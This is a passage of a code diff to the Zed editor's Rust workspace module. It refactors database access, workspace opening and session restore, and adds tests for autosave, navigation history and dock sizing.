(None, None) }; - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); let theme = cx.theme().clone(); let colors = theme.colors(); @@ -7557,6 +8141,7 @@ impl Render for Workspace { { workspace.previous_dock_drag_coordinates = Some(e.event.position); + match e.drag(cx).0 { DockPosition::Left => { workspace.resize_left_dock( @@ -7722,7 +8307,6 @@ impl Render for Workspace { window, cx, )), - BottomDockLayout::RightAligned => div() .flex() .flex_row() @@ -7781,7 +8365,6 @@ impl Render for Workspace { .children(self.render_dock(DockPosition::Bottom, &self.bottom_dock, window, cx)) ), ), - BottomDockLayout::Contained => div() .flex() .flex_row() @@ -8033,9 +8616,10 @@ impl WorkspaceHandle for Entity { } pub async fn last_opened_workspace_location( + db: &WorkspaceDb, fs: &dyn fs::Fs, ) -> Option<(WorkspaceId, SerializedWorkspaceLocation, PathList)> { - DB.last_workspace(fs) + db.last_workspace(fs) .await .log_err() .flatten() @@ -8043,43 +8627,47 @@ pub async fn last_opened_workspace_location( } pub async fn last_session_workspace_locations( + db: &WorkspaceDb, last_session_id: &str, last_session_window_stack: Option>, fs: &dyn fs::Fs, ) -> Option> { - DB.last_session_workspace_locations(last_session_id, last_session_window_stack, fs) + db.last_session_workspace_locations(last_session_id, last_session_window_stack, fs) .await .log_err() } -pub struct MultiWorkspaceRestoreResult { - pub window_handle: WindowHandle, - pub errors: Vec, -} - pub async fn restore_multiworkspace( multi_workspace: SerializedMultiWorkspace, app_state: Arc, cx: &mut AsyncApp, -) -> anyhow::Result { - let SerializedMultiWorkspace { workspaces, state } = multi_workspace; - let mut group_iter = workspaces.into_iter(); - let first = group_iter - .next() - .context("window group must not be empty")?; - - let window_handle = if first.paths.is_empty() { - cx.update(|cx| open_workspace_by_id(first.workspace_id, app_state.clone(), None, cx)) - .await? +) -> anyhow::Result> { + let SerializedMultiWorkspace { + active_workspace, + state, + } = multi_workspace; + let MultiWorkspaceState { + sidebar_open, + project_group_keys, + sidebar_state, + .. + } = state; + + let window_handle = if active_workspace.paths.is_empty() { + cx.update(|cx| { + open_workspace_by_id(active_workspace.workspace_id, app_state.clone(), None, cx) + }) + .await? } else { - let (window, _items) = cx + let OpenResult { window, .. } = cx .update(|cx| { Workspace::new_local( - first.paths.paths().to_vec(), + active_workspace.paths.paths().to_vec(), app_state.clone(), None, None, None, + OpenMode::Activate, cx, ) }) @@ -8087,68 +8675,31 @@ pub async fn restore_multiworkspace( window }; - let mut errors = Vec::new(); - - for session_workspace in group_iter { - let error = if session_workspace.paths.is_empty() { - cx.update(|cx| { - open_workspace_by_id( - session_workspace.workspace_id, - app_state.clone(), - Some(window_handle), - cx, - ) - }) - .await - .err() - } else { - cx.update(|cx| { - Workspace::new_local( - session_workspace.paths.paths().to_vec(), - app_state.clone(), - Some(window_handle), - None, - None, - cx, - ) - }) - .await - .err() - }; - - if let Some(error) = error { - errors.push(error); - } - } - - if let Some(target_id) = state.active_workspace_id { + if !project_group_keys.is_empty() { + let restored_keys: Vec = + project_group_keys.into_iter().map(Into::into).collect(); window_handle - .update(cx, |multi_workspace, window, cx| { - let target_index = multi_workspace - .workspaces() - .iter() - .position(|ws| ws.read(cx).database_id() == Some(target_id)); - if let Some(index) = target_index { - multi_workspace.activate_index(index, window, cx); - } else if !multi_workspace.workspaces().is_empty() { - multi_workspace.activate_index(0, window, cx); - } + .update(cx, |multi_workspace, _window, _cx| { + multi_workspace.restore_project_group_keys(restored_keys); }) .ok(); - } else { + } + + if sidebar_open { window_handle - .update(cx, |multi_workspace, window, cx| { - if !multi_workspace.workspaces().is_empty() { - multi_workspace.activate_index(0, window, cx); - } + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); }) .ok(); } - if state.sidebar_open { + if let Some(sidebar_state) = sidebar_state { window_handle - .update(cx, |multi_workspace, _, cx| { - multi_workspace.open_sidebar(cx); + .update(cx, |multi_workspace, window, cx| { + if let Some(sidebar) = multi_workspace.sidebar() { + sidebar.restore_serialized_state(&sidebar_state, window, cx); + } + multi_workspace.serialize(cx); }) .ok(); } @@ -8159,10 +8710,7 @@ pub async fn restore_multiworkspace( }) .ok(); - Ok(MultiWorkspaceRestoreResult { - window_handle, - errors, - }) + Ok(window_handle) } actions!( @@ -8191,6 +8739,15 @@ actions!( CopyRoomId, ] ); + +/// Opens the channel notes for a specific channel by its ID. +#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] +#[action(namespace = collab)] +#[serde(deny_unknown_fields)] +pub struct OpenChannelNotesById { + pub channel_id: u64, +} + actions!( zed, [ @@ -8370,7 +8927,10 @@ pub fn join_channel( let mut active_window = requesting_window.or_else(|| activate_any_workspace_window(cx)); if active_window.is_none() { // no open workspaces, make one to show the error in (blergh) - let (window_handle, _) = cx + let OpenResult { + window: window_handle, + .. + } = cx .update(|cx| { Workspace::new_local( vec![], @@ -8378,6 +8938,7 @@ pub fn join_channel( requesting_window, None, None, + OpenMode::Activate, cx, ) }) @@ -8450,8 +9011,18 @@ pub async fn get_any_active_multi_workspace( // find an existing workspace to focus and show call controls let active_window = activate_any_workspace_window(&mut cx); if active_window.is_none() { - cx.update(|cx| Workspace::new_local(vec![], app_state.clone(), None, None, None, cx)) - .await?; + cx.update(|cx| { + Workspace::new_local( + vec![], + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ) + }) + .await?; } activate_any_workspace_window(&mut cx).context("could not open zed") } @@ -8508,7 +9079,7 @@ pub fn workspace_windows_for_location( }; multi_workspace.read(cx).is_ok_and(|multi_workspace| { - multi_workspace.workspaces().iter().any(|workspace| { + multi_workspace.workspaces().any(|workspace| { match workspace.read(cx).workspace_location(cx) { WorkspaceLocation::Location(location, _) => { match (&location, serialized_location) { @@ -8621,8 +9192,18 @@ pub struct OpenOptions { pub focus: Option, pub open_new_workspace: Option, pub wait: bool, - pub replace_window: Option>, + pub requesting_window: Option>, + pub open_mode: OpenMode, pub env: Option>, + pub open_in_dev_container: bool, +} + +/// The result of opening a workspace via [`open_paths`], [`Workspace::new_local`], +/// or [`Workspace::open_workspace_for_paths`]. +pub struct OpenResult { + pub window: WindowHandle, + pub workspace: Entity, + pub opened_items: Vec>>>, } /// Opens a workspace by its database ID, used for restoring empty workspaces with unsaved content. @@ -8646,8 +9227,10 @@ pub fn open_workspace_by_id( cx, ); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.spawn(async move |cx| { - let serialized_workspace = persistence::DB + let serialized_workspace = db .workspace_for_id(workspace_id) .with_context(|| format!("Workspace {workspace_id:?} not found"))?; @@ -8666,7 +9249,7 @@ pub fn open_workspace_by_id( workspace.centered_layout = centered_layout; workspace }); - multi_workspace.add_workspace(workspace.clone(), cx); + multi_workspace.add(workspace.clone(), &*window, cx); workspace })?; (window, workspace) @@ -8679,7 +9262,7 @@ pub fn open_workspace_by_id( && let Some(bounds) = serialized_workspace.window_bounds.as_ref() { (Some(bounds.0), Some(display)) - } else if let Some((display, bounds)) = persistence::read_default_window_bounds() { + } else if let Some((display, bounds)) = persistence::read_default_window_bounds(&kvp) { (Some(bounds), Some(display)) } else { (None, None) @@ -8742,14 +9325,9 @@ pub fn open_workspace_by_id( pub fn open_paths( abs_paths: &[PathBuf], app_state: Arc, - open_options: OpenOptions, + mut open_options: OpenOptions, cx: &mut App, -) -> Task< - anyhow::Result<( - WindowHandle, - Vec>>>, - )>, -> { +) -> Task> { let abs_paths = abs_paths.to_vec(); #[cfg(target_os = "windows")] let wsl_path = abs_paths @@ -8772,10 +9350,9 @@ pub fn open_paths( let all_metadatas = futures::future::join_all(all_paths) .await .into_iter() - .filter_map(|result| result.ok().flatten()) - .collect::>(); + .filter_map(|result| result.ok().flatten()); - if all_metadatas.iter().all(|file| !file.is_dir) { + if all_metadatas.into_iter().all(|file| !file.is_dir) { cx.update(|cx| { let windows = workspace_windows_for_location( &SerializedWorkspaceLocation::Local, @@ -8797,12 +9374,46 @@ pub fn open_paths( } } + // Fallback for directories: when no flag is specified and no existing + // workspace matched, add the directory as a new workspace in the + // active window's MultiWorkspace (instead of opening a new window). + if open_options.open_new_workspace.is_none() && existing.is_none() { + let target_window = cx.update(|cx| { + let windows = workspace_windows_for_location( + &SerializedWorkspaceLocation::Local, + cx, + ); + let window = cx + .active_window() + .and_then(|window| window.downcast::()) + .filter(|window| windows.contains(window)) + .or_else(|| windows.into_iter().next()); + window.filter(|window| { + window.read(cx).is_ok_and(|mw| mw.multi_workspace_enabled(cx)) + }) + }); + + if let Some(window) = target_window { + open_options.requesting_window = Some(window); + window + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .log_err(); + } + } + + let open_in_dev_container = open_options.open_in_dev_container; + let result = if let Some((existing, target_workspace)) = existing { let open_task = existing .update(cx, |multi_workspace, window, cx| { window.activate_window(); - multi_workspace.activate(target_workspace.clone(), cx); + multi_workspace.activate(target_workspace.clone(), window, cx); target_workspace.update(cx, |workspace, cx| { + if open_in_dev_container { + workspace.set_open_in_dev_container(true); + } workspace.open_paths( abs_paths, OpenOptions { @@ -8828,23 +9439,31 @@ pub fn open_paths( }); }); - Ok((existing, open_task)) + Ok(OpenResult { window: existing, workspace: target_workspace, opened_items: open_task }) } else { + let init = if open_in_dev_container { + Some(Box::new(|workspace: &mut Workspace, _window: &mut Window, _cx: &mut Context| { + workspace.set_open_in_dev_container(true); + }) as Box) + Send>) + } else { + None + }; let result = cx .update(move |cx| { Workspace::new_local( abs_paths, app_state.clone(), - open_options.replace_window, + open_options.requesting_window, open_options.env, - None, + init, + open_options.open_mode, cx, ) }) .await; - if let Ok((ref window_handle, _)) = result { - window_handle + if let Ok(ref result) = result { + result.window .update(cx, |_, window, _cx| { window.activate_window(); }) @@ -8856,9 +9475,9 @@ pub fn open_paths( #[cfg(target_os = "windows")] if let Some(util::paths::WslPath{distro, path}) = wsl_path - && let Ok((multi_workspace_window, _)) = &result + && let Ok(ref result) = result { - multi_workspace_window + result.window .update(cx, move |multi_workspace, _window, cx| { struct OpenInWsl; let workspace = multi_workspace.workspace().clone(); @@ -8895,16 +9514,18 @@ pub fn open_new( cx: &mut App, init: impl FnOnce(&mut Workspace, &mut Window, &mut Context) + 'static + Send, ) -> Task> { + let addition = open_options.open_mode; let task = Workspace::new_local( Vec::new(), app_state, - open_options.replace_window, + open_options.requesting_window, open_options.env, Some(Box::new(init)), + addition, cx, ); cx.spawn(async move |cx| { - let (window, _opened_paths) = task.await?; + let OpenResult { window, .. } = task.await?; window .update(cx, |_, window, _cx| { window.activate_window(); @@ -8936,6 +9557,9 @@ pub fn create_and_open_local_file( .read_with(cx, |project, cx| project.try_windows_path_to_wsl(path, cx)); cx.spawn_in(window, async move |workspace, cx| { let path = path.await?; + + let path = fs.canonicalize(&path).await.unwrap_or(path); + let mut items = workspace .update_in(cx, |workspace, window, cx| { workspace.open_paths( @@ -9050,7 +9674,8 @@ async fn open_remote_project_inner( window: WindowHandle, cx: &mut AsyncApp, ) -> Result>>> { - let toolchains = DB.toolchains(workspace_id).await?; + let db = cx.update(|cx| WorkspaceDb::global(cx)); + let toolchains = db.toolchains(workspace_id).await?; for (toolchain, worktree_path, path) in toolchains { project .update(cx, |this, cx| { @@ -9107,7 +9732,7 @@ async fn open_remote_project_inner( workspace }); - multi_workspace.activate(new_workspace.clone(), cx); + multi_workspace.activate(new_workspace.clone(), window, cx); new_workspace })?; @@ -9140,20 +9765,20 @@ fn deserialize_remote_project( paths: Vec, cx: &AsyncApp, ) -> Task)>> { + let db = cx.update(|cx| WorkspaceDb::global(cx)); cx.background_spawn(async move { - let remote_connection_id = persistence::DB + let remote_connection_id = db .get_or_create_remote_connection(connection_options) .await?; - let serialized_workspace = - persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id); + let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id); let workspace_id = if let Some(workspace_id) = serialized_workspace.as_ref().map(|workspace| workspace.id) { workspace_id } else { - persistence::DB.next_id().await? + db.next_id().await? }; Ok((workspace_id, serialized_workspace)) @@ -9194,8 +9819,8 @@ pub fn join_in_room_project( existing_window_and_workspace { existing_window - .update(cx, |multi_workspace, _, cx| { - multi_workspace.activate(target_workspace, cx); + .update(cx, |multi_workspace, window, cx| { + multi_workspace.activate(target_workspace, window, cx); }) .ok(); existing_window @@ -9772,14 +10397,15 @@ pub fn remote_workspace_position_from_db( cx: &App, ) -> Task> { let paths = paths_to_open.to_vec(); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.background_spawn(async move { - let remote_connection_id = persistence::DB + let remote_connection_id = db .get_or_create_remote_connection(connection_options) .await .context("fetching serialized ssh project")?; - let serialized_workspace = - persistence::DB.remote_workspace_for_roots(&paths, remote_connection_id); + let serialized_workspace = db.remote_workspace_for_roots(&paths, remote_connection_id); let (window_bounds, display) = if let Some(bounds) = window_bounds_env_override() { (Some(WindowBounds::Windowed(bounds)), None) @@ -9789,7 +10415,7 @@ pub fn remote_workspace_position_from_db( .and_then(|workspace| { Some((workspace.display?, workspace.window_bounds.map(|b| b.0)?)) }) - .or_else(|| persistence::read_default_window_bounds()); + .or_else(|| persistence::read_default_window_bounds(&kvp)); if let Some((serialized_display, serialized_bounds)) = restorable_bounds { (Some(serialized_bounds), Some(serialized_display)) @@ -9831,22 +10457,71 @@ pub fn with_active_or_new_workspace( } None => { let app_state = AppState::global(cx); - if let Some(app_state) = app_state.upgrade() { - open_new( - OpenOptions::default(), - app_state, - cx, - move |workspace, window, cx| f(workspace, window, cx), - ) - .detach_and_log_err(cx); - } + open_new( + OpenOptions::default(), + app_state, + cx, + move |workspace, window, cx| f(workspace, window, cx), + ) + .detach_and_log_err(cx); } } } +/// Reads a panel's pixel size from its legacy KVP format and deletes the legacy +/// key. This migration path only runs once per panel per workspace. +fn load_legacy_panel_size( + panel_key: &str, + dock_position: DockPosition, + workspace: &Workspace, + cx: &mut App, +) -> Option { + #[derive(Deserialize)] + struct LegacyPanelState { + #[serde(default)] + width: Option, + #[serde(default)] + height: Option, + } + + let workspace_id = workspace + .database_id() + .map(|id| i64::from(id).to_string()) + .or_else(|| workspace.session_id())?; + + let legacy_key = match panel_key { + "ProjectPanel" => { + format!("{}-{:?}", "ProjectPanel", workspace_id) + } + "OutlinePanel" => { + format!("{}-{:?}", "OutlinePanel", workspace_id) + } + "GitPanel" => { + format!("{}-{:?}", "GitPanel", workspace_id) + } + "TerminalPanel" => { + format!("{:?}-{:?}", "TerminalPanel", workspace_id) + } + _ => return None, + }; + + let kvp = db::kvp::KeyValueStore::global(cx); + let json = kvp.read_kvp(&legacy_key).log_err().flatten()?; + let state = serde_json::from_str::(&json).log_err()?; + let size = match dock_position { + DockPosition::Bottom => state.height, + DockPosition::Left | DockPosition::Right => state.width, + }?; + + cx.background_spawn(async move { kvp.delete_kvp(legacy_key).await }) + .detach_and_log_err(cx); + + Some(size) +} + #[cfg(test)] mod tests { - use std::{cell::RefCell, rc::Rc}; + use std::{cell::RefCell, rc::Rc, sync::Arc, time::Duration}; use super::*; use crate::{ @@ -9864,6 +10539,7 @@ mod tests { use project::{Project, ProjectEntryId}; use serde_json::json; use settings::SettingsStore; + use util::path; use util::rel_path::rel_path; #[gpui::test] @@ -10065,6 +10741,12 @@ mod tests { cx.add_window(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); cx.run_until_parked(); + multi_workspace_handle + .update(cx, |mw, _window, cx| { + mw.open_sidebar(cx); + }) + .unwrap(); + let workspace_a = multi_workspace_handle .read_with(cx, |mw, _| mw.workspace().clone()) .unwrap(); @@ -10078,7 +10760,8 @@ mod tests { // Activate workspace A multi_workspace_handle .update(cx, |mw, window, cx| { - mw.activate_index(0, window, cx); + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); }) .unwrap(); @@ -10099,7 +10782,7 @@ mod tests { // Verify workspace A is active multi_workspace_handle .read_with(cx, |mw, _| { - assert_eq!(mw.active_workspace_index(), 0); + assert_eq!(mw.workspace(), &workspace_a); }) .unwrap(); @@ -10115,8 +10798,8 @@ mod tests { multi_workspace_handle .read_with(cx, |mw, _| { assert_eq!( - mw.active_workspace_index(), - 1, + mw.workspace(), + &workspace_b, "workspace B should be activated when it prompts" ); }) @@ -10582,46 +11265,125 @@ mod tests { } #[gpui::test] - async fn test_pane_navigation(cx: &mut gpui::TestAppContext) { + async fn test_autosave_on_focus_change_in_multibuffer(cx: &mut gpui::TestAppContext) { init_test(cx); let fs = FakeFs::new(cx.executor()); - let project = Project::test(fs, [], cx).await; let (workspace, cx) = cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + // Create a multibuffer-like item with two child focus handles, + // simulating individual buffer editors within a multibuffer. let item = cx.new(|cx| { - TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "1.txt", cx)]) + TestItem::new(cx) + .with_project_items(&[TestProjectItem::new(1, "1.txt", cx)]) + .with_child_focus_handles(2, cx) }); - let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); - let toolbar = pane.read_with(cx, |pane, _| pane.toolbar().clone()); - let toolbar_notify_count = Rc::new(RefCell::new(0)); - workspace.update_in(cx, |workspace, window, cx| { workspace.add_item_to_active_pane(Box::new(item.clone()), None, true, window, cx); - let toolbar_notification_count = toolbar_notify_count.clone(); - cx.observe_in(&toolbar, window, move |_, _, _, _| { - *toolbar_notification_count.borrow_mut() += 1 - }) - .detach(); }); - pane.read_with(cx, |pane, _| { - assert!(!pane.can_navigate_backward()); - assert!(!pane.can_navigate_forward()); + // Set autosave to OnFocusChange and focus the first child handle, + // simulating the user's cursor being inside one of the multibuffer's excerpts. + item.update_in(cx, |item, window, cx| { + SettingsStore::update_global(cx, |settings, cx| { + settings.update_user_settings(cx, |settings| { + settings.workspace.autosave = Some(AutosaveSetting::OnFocusChange); + }) + }); + item.is_dirty = true; + window.focus(&item.child_focus_handles[0], cx); }); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| assert_eq!(item.save_count, 0)); - item.update_in(cx, |item, _, cx| { - item.set_state("one".to_string(), cx); + // Moving focus from one child to another within the same item should + // NOT trigger autosave — focus is still within the item's focus hierarchy. + item.update_in(cx, |item, window, cx| { + window.focus(&item.child_focus_handles[1], cx); + }); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| { + assert_eq!( + item.save_count, 0, + "Switching focus between children within the same item should not autosave" + ); }); - // Toolbar must be notified to re-render the navigation buttons - assert_eq!(*toolbar_notify_count.borrow(), 1); + // Blurring the item saves the file. This is the core regression scenario: + // with `on_blur`, this would NOT trigger because `on_blur` only fires when + // the item's own focus handle is the leaf that lost focus. In a multibuffer, + // the leaf is always a child focus handle, so `on_blur` never detected + // focus leaving the item. + item.update_in(cx, |_, window, _| window.blur()); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| { + assert_eq!( + item.save_count, 1, + "Blurring should trigger autosave when focus was on a child of the item" + ); + }); - pane.read_with(cx, |pane, _| { - assert!(pane.can_navigate_backward()); - assert!(!pane.can_navigate_forward()); + // Deactivating the window should also trigger autosave when a child of + // the multibuffer item currently owns focus. + item.update_in(cx, |item, window, cx| { + item.is_dirty = true; + window.focus(&item.child_focus_handles[0], cx); + }); + cx.executor().run_until_parked(); + item.read_with(cx, |item, _| assert_eq!(item.save_count, 1)); + + cx.deactivate_window(); + item.read_with(cx, |item, _| { + assert_eq!( + item.save_count, 2, + "Deactivating window should trigger autosave when focus was on a child" + ); + }); + } + + #[gpui::test] + async fn test_pane_navigation(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, [], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "1.txt", cx)]) + }); + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + let toolbar = pane.read_with(cx, |pane, _| pane.toolbar().clone()); + let toolbar_notify_count = Rc::new(RefCell::new(0)); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane(Box::new(item.clone()), None, true, window, cx); + let toolbar_notification_count = toolbar_notify_count.clone(); + cx.observe_in(&toolbar, window, move |_, _, _, _| { + *toolbar_notification_count.borrow_mut() += 1 + }) + .detach(); + }); + + pane.read_with(cx, |pane, _| { + assert!(!pane.can_navigate_backward()); + assert!(!pane.can_navigate_forward()); + }); + + item.update_in(cx, |item, _, cx| { + item.set_state("one".to_string(), cx); + }); + + // Toolbar must be notified to re-render the navigation buttons + assert_eq!(*toolbar_notify_count.borrow(), 1); + + pane.read_with(cx, |pane, _| { + assert!(pane.can_navigate_backward()); + assert!(!pane.can_navigate_forward()); }); workspace @@ -10638,6 +11400,128 @@ mod tests { }); } + /// Tests that the navigation history deduplicates entries for the same item. + /// + /// When navigating back and forth between items (e.g., A -> B -> A -> B -> A -> B -> C), + /// the navigation history deduplicates by keeping only the most recent visit to each item, + /// resulting in [A, B, C] instead of [A, B, A, B, A, B, C]. This ensures that Go Back (Ctrl-O) + /// navigates through unique items efficiently: C -> B -> A, rather than bouncing between + /// repeated entries: C -> B -> A -> B -> A -> B -> A. + /// + /// This behavior prevents the navigation history from growing unnecessarily large and provides + /// a better user experience by eliminating redundant navigation steps when jumping between files. + #[gpui::test] + async fn test_navigation_history_deduplication(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project, window, cx)); + + let item_a = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "a.txt", cx)]) + }); + let item_b = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(2, "b.txt", cx)]) + }); + let item_c = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(3, "c.txt", cx)]) + }); + + let pane = workspace.read_with(cx, |workspace, _| workspace.active_pane().clone()); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane(Box::new(item_a.clone()), None, true, window, cx); + workspace.add_item_to_active_pane(Box::new(item_b.clone()), None, true, window, cx); + workspace.add_item_to_active_pane(Box::new(item_c.clone()), None, true, window, cx); + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_a, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_b, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_a, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_b, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_a, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_b, false, false, window, cx); + }); + cx.run_until_parked(); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.activate_item(&item_c, false, false, window, cx); + }); + cx.run_until_parked(); + + let backward_count = pane.read_with(cx, |pane, cx| { + let mut count = 0; + pane.nav_history().for_each_entry(cx, &mut |_, _| { + count += 1; + }); + count + }); + assert!( + backward_count <= 4, + "Should have at most 4 entries, got {}", + backward_count + ); + + workspace + .update_in(cx, |workspace, window, cx| { + workspace.go_back(pane.downgrade(), window, cx) + }) + .await + .unwrap(); + + let active_item = workspace.read_with(cx, |workspace, cx| { + workspace.active_item(cx).unwrap().item_id() + }); + assert_eq!( + active_item, + item_b.entity_id(), + "After first go_back, should be at item B" + ); + + workspace + .update_in(cx, |workspace, window, cx| { + workspace.go_back(pane.downgrade(), window, cx) + }) + .await + .unwrap(); + + let active_item = workspace.read_with(cx, |workspace, cx| { + workspace.active_item(cx).unwrap().item_id() + }); + assert_eq!( + active_item, + item_a.entity_id(), + "After second go_back, should be at item A" + ); + + pane.read_with(cx, |pane, _| { + assert!(pane.can_navigate_forward(), "Should be able to go forward"); + }); + } + #[gpui::test] async fn test_activate_last_pane(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -10736,6 +11620,7 @@ mod tests { assert!(workspace.right_dock().read(cx).is_open()); assert!(!panel.is_zoomed(window, cx)); assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx)); + assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx)); }); // Close the dock @@ -10747,6 +11632,7 @@ mod tests { assert!(!workspace.right_dock().read(cx).is_open()); assert!(!panel.is_zoomed(window, cx)); assert!(!panel.read(cx).focus_handle(cx).contains_focused(window, cx)); + assert!(pane.read(cx).focus_handle(cx).contains_focused(window, cx)); }); // Open the dock @@ -11538,6 +12424,394 @@ mod tests { assert_eq!(active_item.item_id(), last_item.item_id()); }); } + + #[gpui::test] + async fn test_flexible_dock_sizing(cx: &mut gpui::TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + let project = Project::test(fs, [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.bounds.size.width = px(800.); + }); + + workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| TestPanel::new_flexible(DockPosition::Right, 100, cx)); + workspace.add_panel(panel, window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + }); + + let (panel, resized_width, ratio_basis_width) = + workspace.update_in(cx, |workspace, window, cx| { + let item = cx.new(|cx| { + TestItem::new(cx).with_project_items(&[TestProjectItem::new(1, "one.txt", cx)]) + }); + workspace.add_item_to_active_pane(Box::new(item), None, true, window, cx); + + let dock = workspace.right_dock().read(cx); + let workspace_width = workspace.bounds.size.width; + let initial_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should have an initial width"); + + assert_eq!(initial_width, workspace_width / 2.); + + workspace.resize_right_dock(px(300.), window, cx); + + let dock = workspace.right_dock().read(cx); + let resized_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should keep its resized width"); + + assert_eq!(resized_width, px(300.)); + + let panel = workspace + .right_dock() + .read(cx) + .visible_panel() + .expect("flexible dock should have a visible panel") + .panel_id(); + + (panel, resized_width, workspace_width) + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.toggle_dock(DockPosition::Right, window, cx); + workspace.toggle_dock(DockPosition::Right, window, cx); + + let dock = workspace.right_dock().read(cx); + let reopened_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should restore when reopened"); + + assert_eq!(reopened_width, resized_width); + + let right_dock = workspace.right_dock().read(cx); + let flexible_panel = right_dock + .visible_panel() + .expect("flexible dock should still have a visible panel"); + assert_eq!(flexible_panel.panel_id(), panel); + assert_eq!( + right_dock + .stored_panel_size_state(flexible_panel.as_ref()) + .and_then(|size_state| size_state.flex), + Some( + resized_width.to_f64() as f32 + / (workspace.bounds.size.width - resized_width).to_f64() as f32 + ) + ); + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.split_pane( + workspace.active_pane().clone(), + SplitDirection::Right, + window, + cx, + ); + + let dock = workspace.right_dock().read(cx); + let split_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should keep its user-resized proportion"); + + assert_eq!(split_width, px(300.)); + + workspace.bounds.size.width = px(1600.); + + let dock = workspace.right_dock().read(cx); + let resized_window_width = workspace + .dock_size(&dock, window, cx) + .expect("flexible dock should preserve proportional size on window resize"); + + assert_eq!( + resized_window_width, + workspace.bounds.size.width + * (resized_width.to_f64() as f32 / ratio_basis_width.to_f64() as f32) + ); + }); + } + + #[gpui::test] + async fn test_panel_size_state_persistence(cx: &mut gpui::TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Fixed-width panel: pixel size is persisted to KVP and restored on re-add. + { + let project = Project::test(fs.clone(), [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + workspace.update(cx, |workspace, _cx| { + workspace.set_random_database_id(); + workspace.bounds.size.width = px(800.); + }); + + let panel = workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| TestPanel::new(DockPosition::Left, 100, cx)); + workspace.add_panel(panel.clone(), window, cx); + workspace.toggle_dock(DockPosition::Left, window, cx); + panel + }); + + workspace.update_in(cx, |workspace, window, cx| { + workspace.resize_left_dock(px(350.), window, cx); + }); + + cx.run_until_parked(); + + let persisted = workspace.read_with(cx, |workspace, cx| { + workspace.persisted_panel_size_state(TestPanel::panel_key(), cx) + }); + assert_eq!( + persisted.and_then(|s| s.size), + Some(px(350.)), + "fixed-width panel size should be persisted to KVP" + ); + + // Remove the panel and re-add a fresh instance with the same key. + // The new instance should have its size state restored from KVP. + workspace.update_in(cx, |workspace, window, cx| { + workspace.remove_panel(&panel, window, cx); + }); + + workspace.update_in(cx, |workspace, window, cx| { + let new_panel = cx.new(|cx| TestPanel::new(DockPosition::Left, 100, cx)); + workspace.add_panel(new_panel, window, cx); + + let left_dock = workspace.left_dock().read(cx); + let size_state = left_dock + .panel::() + .and_then(|p| left_dock.stored_panel_size_state(&p)); + assert_eq!( + size_state.and_then(|s| s.size), + Some(px(350.)), + "re-added fixed-width panel should restore persisted size from KVP" + ); + }); + } + + // Flexible panel: both pixel size and ratio are persisted and restored. + { + let project = Project::test(fs.clone(), [], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| 